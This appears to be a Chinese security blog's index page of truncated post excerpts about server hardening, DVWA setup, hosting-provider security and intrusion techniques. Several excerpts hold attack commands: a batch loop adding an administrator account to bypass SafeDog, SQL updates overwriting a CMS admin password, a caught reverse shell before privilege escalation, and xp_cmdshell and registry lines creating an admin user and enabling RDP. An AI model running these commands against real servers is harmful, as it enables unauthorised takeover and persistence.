1.循环加组复现 for /l %%i in (1,1,1000) do @net user admin admin /add&@ net localgroup administrators admin /add 这曾经是安全狗最早爆出的安全狗漏洞 但是安全狗很快的在之后的版本修复了 上月某非盈利安全研究小组研究人员发现其实安全狗只是阻截了系统的net/net1执行  同时把你net放到别的目录…继续阅读 »

update nimeizi_enewsuseradd set equestion='0',eanswer='' where userid='1' 这句话的大概意思就是更新id为1的状态 update nimeizi_enewsuser set password='cdebbca8d8b6a7676bd29b74880cf263',salt='HKUlcSfo',salt2='2ftqGHXrxyr70WfW34jz' where userid='1' 这句话大概意思。。。其实我也不知道（好吧我瞎猜的）   lz最近疯了。。各种日狗…继续阅读 »

    关于景安机房的服务器助手的问题 下面看图   如上图所示    所有的站点搭建过程都是“景安服务器管理助手”完成的 其中有2方面的大问题： 1.IIS需要SYSTEM来运行么？   程序员写程序的时候能不能严谨点  或者建立的站点跟随默认进程池权限就可以 2.创建站…继续阅读 »

废话不多说  直接贴代码 <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <security> <requestFiltering> <fileExtensions> <add fileExtension=".aspx" allowed="false" /> <add fileExtension=".asmx" allowed="false" /> <add fileExtension=".asp" allowed="false" /> <add fileExtension=".php" allo…继续阅读 »

    DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。     首先下载到准备安装的主机上    然后将sql文件导入数据库 更改数据库配置文件   最后安装成…继续阅读 »

测试模式 是为了测试一些硬件而设立的，windows2008R2默认是不允许安装没有认证的驱动的，而新的硬件肯定没有微软的认证驱动，为了测试这些硬件及其驱动，就要用到这个测试模式。 你安装的防火墙，使用了虚拟硬件（网卡）这个技术，而他的驱动没有微软认证，软件为了能正常运行，就打开了测试…继续阅读 »

其实让我写这篇文章我是拒绝的    但是我在看了国内某些IDC服务商  特别是互联中国的一些做法的时候  就不得不让人很恼火了 首先我们来谈谈在虚拟主机的业务安全性讨论 其实国内大部分虚拟主机都是做的比较好的   比如万网 爱名网 美橙互联 等    其中以上3个IDC服务器商在一些服务上就…继续阅读 »

1.反弹shell 2.接受反弹的shell 3.执行提权EXP 结束   END   listening on [any] 443... x.x.x.x: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.0.0.10] from (UNKNOWN) [x.x.x.x] 46911: NO_DATA Linux cloud 2.6.32-358.el6.x86_64 #1 SMP Fri Feb 22 00:31:26 UTC 2013 x86_64 x86 _64 x86_64 GNU/Linux uid=1000(www) gid=1000(www) groups=1000(www) context=…继续阅读 »

 WIN2000直接建立用户： exec xp_cmdshell 'net user admin$ 199181 /add' exec xp_cmdshell 'net localGroup Administrators admin$ /add' SQL语句开启3389: exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0; SQL语句关闭3389: exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Cont…继续阅读 »

安装idcsystem数据备份  以及恢复方法   下午放出 ps:恢复之前请先备份以前的数据   另外有三个组件是必须下载的 1.sql server 2008 R2 （废话了）               （嘘  不要告诉别人我有官方最快捷的安装方法   url下载地址我会在适当的时候放出  需要可以找我私聊） 2.URL重写组件（又j8废话了…继续阅读 »